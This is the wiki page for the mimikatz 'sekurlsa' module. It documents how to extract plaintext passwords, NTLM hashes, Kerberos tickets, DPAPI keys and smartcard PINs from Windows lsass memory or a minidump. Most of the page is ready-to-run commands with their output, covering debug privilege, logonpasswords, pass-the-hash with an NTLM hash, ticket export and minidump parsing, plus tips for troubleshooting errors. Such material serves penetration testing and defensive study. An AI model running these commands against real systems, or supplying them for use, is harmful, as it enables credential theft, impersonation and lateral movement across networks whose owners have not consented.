Skip to content

module ~ sekurlsa

Jump to bottom
Benjamin DELPY edited this page May 1, 2014 · 43 revisions

This module extracts passwords, keys, pin codes, tickets from the memory of lsass (Local Security Authority Subsystem Service)
the process by default, or a minidump of it! (see: howto ~ get passwords by memory dump for minidump or other dumps instructions)

When working with lsass process, mimikatz needs some rights, choice:

  • Administrator, to get debug privilege via privilege::debug
  • SYSTEM account, via post exploitation tools, scheduled tasks, psexec -s ... - in this case debug privilege is not needed.

Without rights to access lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump).

So, do not hesitate to start with:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK

...before others commands 😉

The information that can be extracted depends on the version of Windows and authentication methods: [en] http://1drv.ms/1fCWkhu

Commands: logonpasswords, pth, tickets, ekeys, dpapi, minidump, process, searchpasswords, msv, wdigest, kerberos, tspkg, livessp, ssp, credman

logonpasswords

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        wdigest :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        kerberos :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        ssp :
         [00000000]
         * Username : admin
         * Domain   : nas
         * Password : anotherpassword
        credman :
         [00000000]
         * Username : nas\admin
         * Domain   : nas.chocolate.local
         * Password : anotherpassword

pth

Pass-The-Hash

mimikatz can perform the well-known operation 'Pass-The-Hash' to run a process under another credentials with NTLM hash of the user's password, instead of its real password.

For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).

Arguments:

  • /user - the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account.
  • /domain - the domain name - without domain or in case of local user/admin, use computer or server name, workgroup or whatever.
  • /ntlm - the NTLM hash of the user's password
  • /run - optional - the command line to run - default is: cmd to have a shell.
mimikatz # sekurlsa::pth /user:utilisateur /domain:chocolate /ntlm:8e3a18d453ec2450c321003772d678d5 /run:"cmd /k dir \\win81.chocolate.local\test\flag.txt"
user    : utilisateur
domain  : chocolate
NTLM    : 8e3a18d453ec2450c321003772d678d5
Program : cmd /k dir \\win81.chocolate.local\test\flag.txt
  |  PID  1828
  |  TID  856
  |  LUID 0 ; 3201168 (00000000:0030d890)
  \_ Data copy @ 00000000004A6300 : OK !

Remarks:

  • This command does not work with minidumps (nonsense);
  • it requires elevated privileges (privilege::debug or SYSTEM account), unlike 'Pass-The-Ticket' which uses one official API.

See also:

tickets

mimikatz # sekurlsa::tickets /exports

Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session           : Interactive from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 01/05/2014 13:10:34 ; 01/05/2014 23:10:32 ; 08/05/2014 13:10:32
           Service Name (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
           Target Name  (02) : ldap ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
           Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key  (12) : 98 e1 21 96 d0 de cd aa 71 69 4e 90 21 06 32 53 1c 7e d1 0d 41 5c f2 50 33 8e d0 4f b8 81 a5 56
           Ticket  (04 - 12) : [...]
           * Saved to file [0;3d7a4]-0-0-40a50000-Administrateur@ldap-srvcharly.chocolate.local.kirbi !

         [00000001]
           Start/End/MaxRenew: 01/05/2014 13:10:33 ; 01/05/2014 23:10:32 ; 08/05/2014 13:10:32
           Service Name (02) : cifs ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
           Target Name  (02) : cifs ; srvcharly.chocolate.local ; @ CHOCOLATE.LOCAL
           Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key  (12) : b1 13 48 be 8a 9c 65 97 85 4a ba c6 04 85 4d 32 ca f5 47 5e 35 23 37 9b d7 60 d2 8d fd 96 9b 8c
           Ticket  (04 - 12) : [...]
           * Saved to file [0;3d7a4]-0-1-40a50000-Administrateur@cifs-srvcharly.chocolate.local.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 01/05/2014 13:10:32 ; 01/05/2014 23:10:32 ; 08/05/2014 13:10:32
           Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
           Target Name  (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
           Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE.LOCAL )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key  (12) : 56 e8 ba b9 8d 12 db d3 b3 e8 2c de 53 e1 a2 74 c7 5b 5a ab 2b 64 81 28 03 b4 8e 05 41 41 6b 6a
           Ticket  (02 - 12) : [...]
           * Saved to file [0;3d7a4][email protected] !

ekeys

mimikatz # sekurlsa::ekeys

Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session           : Interactive from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500

        Key List @ 00AF9CD8
           23 : cc36cf7a8514893efccd332446158b1a
         -133 : cc36cf7a8514893efccd332446158b1a
         -128 : cc36cf7a8514893efccd332446158b1a
           24 : cc36cf7a8514893efccd332446158b1a
         -135 : cc36cf7a8514893efccd332446158b1a

dpapi

mimikatz # sekurlsa::dpapi

Authentication Id : 0 ; 251812 (00000000:0003d7a4)
Session           : Interactive from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
         [00000000]
         * GUID :       {62f69fd3-0a99-4531-bf94-7442fdf1e411}
         * Time :       01/05/2014 13:12:39
         * Key :        8801bde168af739ab81aa32b79aa0ee4c27cb9c0dc94b6ab0a8516e650b4bdd565110ae1040d3e47add422454d92b307276bebdba7b23b2b2f8005066ede3580

minidump

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
...

Remark:

Dump from Works on
NT 5 - x86 NT 5 - x86
NT 5 - x64 NT 5 - x64
NT 6 - x86 NT 6 - x86/x64 (mimikatz x86)
NT 6 - x64 NT 6 - x64

Some errors:

  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B)
    You try to open minidump from a Windows NT of another major version (NT5 vs NT6).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B)
    You try to open minidump from a Windows NT of another architecture (x86 vs x64).
  • ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)
    The minidump file is not found (check path).

process

searchpasswords

msv

Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session           : Unlock from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
        msv :
         [00010000] CredentialKeys
         * RootKey  : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14
         * DPAPI    : 43d7b788389b67ee3bcac1786f01a75f

Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session           : Interactive from 2
User Name         : utilisateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-1107
        msv :
         [00010000] CredentialKeys
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
         [00000003] Primary
         * Username : utilisateur
         * Domain   : CHOCOLATE
         * LM       : 00000000000000000000000000000000
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa

wdigest

kerberos

When using smartcard logon on the domain, lsass caches PIN code of the smartcard

mimikatz # sekurlsa::kerberos
[...]
        kerberos :
         * Username : Administrateur
         * Domain   : CHOCOLATE.LOCAL
         * Password : (null)
         * PIN code : 1234

tspkg

livessp

ssp

credman

Clone this wiki locally